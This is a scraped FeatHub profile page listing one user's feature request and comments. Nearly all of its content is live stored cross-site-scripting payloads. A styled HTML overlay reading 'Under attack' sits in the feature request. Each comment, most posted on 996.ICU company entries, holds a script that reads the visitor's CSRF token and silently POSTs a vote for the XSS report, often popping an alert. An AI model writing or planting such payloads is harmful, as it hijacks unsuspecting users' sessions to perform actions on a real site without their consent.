reinit

Projects

This user doesn't have any project on FeatHub yet.

Features suggested

Project Feature Score Description
feathub/feathub Better protection against XSS attack 4 This system can be abused to inject HTML code, some of which is dangerous and thus must be prevented. The actual exploitation can be found here: https://feathub.com/xss67612 <table style="left: 0px; bottom: 0px; position: fixed;z-index: 5000;width:100%;background-color: rgba(255, 0, 0, 0.5);"><tbody><tr><td style="color:#FFFFFF;z-index: 6000;vertical-align:top;"><center><h1>Under attack</h1></center></td></tr></tbody></table>

Comments

Project Feature Comment When
feathub/feathub YOUR SITE EXISTS XSS <script> var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU Alibaba Please report XSS vulnerability https://feathub.com/feathub/feathub/+65 <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU Youzan Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU JD.com (pretending to be pinned: voting works normally. To view comments, please disable JavaScript) Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU Perfect World Often working overtime until 3 or 4 a.m., no overtime pay (the DOTA2 servers keep crashing... how exactly are you doing your overtime....) <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Content-Length", "129"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU Perfect World Often working overtime until 3 or 4 a.m., no overtime pay (the DOTA2 servers keep crashing... how exactly are you doing your overtime....) <script> var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU Pinduoduo <script> var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU Pinduoduo <script> var xmlReq = new XMLHttpRequest(); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send("_method=patch&authenticity_token=" + document.head.querySelector("[name~=csrf-token][content]").content); </script> 6 months ago
LinXueyuanStdio/996.ICU Pinduoduo <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago
LinXueyuanStdio/996.ICU Alibaba Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago
LinXueyuanStdio/996.ICU Youzan Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago
LinXueyuanStdio/996.ICU JD.com (pretending to be pinned: voting works normally. To view comments, please disable JavaScript) Please report XSS vulnerability <script> var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send(); </script> 6 months ago

Votes

Vote When Project Feature
6 months ago feathub/feathub Better protection against XSS attack